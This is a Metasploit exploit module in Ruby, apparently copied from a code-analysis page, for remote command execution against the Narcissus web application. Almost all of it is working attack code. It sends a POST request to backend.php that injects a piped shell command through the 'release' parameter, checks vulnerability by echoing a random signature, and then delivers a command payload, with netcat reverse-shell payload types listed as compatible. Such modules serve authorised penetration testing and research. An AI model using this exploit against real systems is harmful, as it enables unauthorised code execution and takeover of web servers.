modules/exploits/unix/webapp/narcissus_backend_exec.rb from rapid7/metasploit-framework

modules/exploits/unix/webapp/narcissus_backend_exec.rb
Summary

Maintainability

1 hr
Test Coverage

Issues
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Narcissus Image Configuration Passthru Vulnerability",
      'Description'    => %q{
          This module exploits a vulnerability found in Narcissus image configuration
        function.  This is due to the backend.php file not handling the $release parameter
        properly, and then passes it on to the configure_image() function.  In this
        function, the $release parameter can be used to inject system commands for
        passthru (a PHP function that's meant to be used to run a bash script by the
        vulnerable application), which allows remote code execution under the context
        of the web server.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Dun',    #Original
          'sinn3r'  #Metasploit
        ],
      'References'     =>
        [
          [ 'EDB', '22709' ],
          [ 'OSVDB', '87410' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00\x0d\x0a",
          'Compat'         =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'generic perl ruby python netcat netcat-e'
            },
        },
      'Platform'       => %w{ linux unix },
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['Narcissus', {}]
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2012-11-14',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The URI path to the web application', '/narcissus-master/'])
      ])
  end

  def base
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    return uri
  end

  def remote_exe(command)
    res = send_request_cgi({
      'uri'      => "#{base}backend.php",
      'method'   => 'POST',
      'encode_params' => false,
      'vars_post' => {
        'machine' => '0',
        'action'  => 'configure_image',
        'release' => "|#{command}"
      }
    })

    vprint_line(res.body) if res
    return res
  end

  def check
    sig = rand_text_alpha(rand(10) + 5)  #The string to check

    vprint_status("Looking for signature '#{sig}'...")
    res = remote_exe("echo #{sig}")

    if res and res.body =~ /#{sig}/
      vprint_status("Signature '#{sig}' found.")
      return Exploit::CheckCode::Vulnerable
    else
      vprint_status("Signature not found")
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    print_status("Sending malicious request...")
    remote_exe(payload.encoded)
  end


end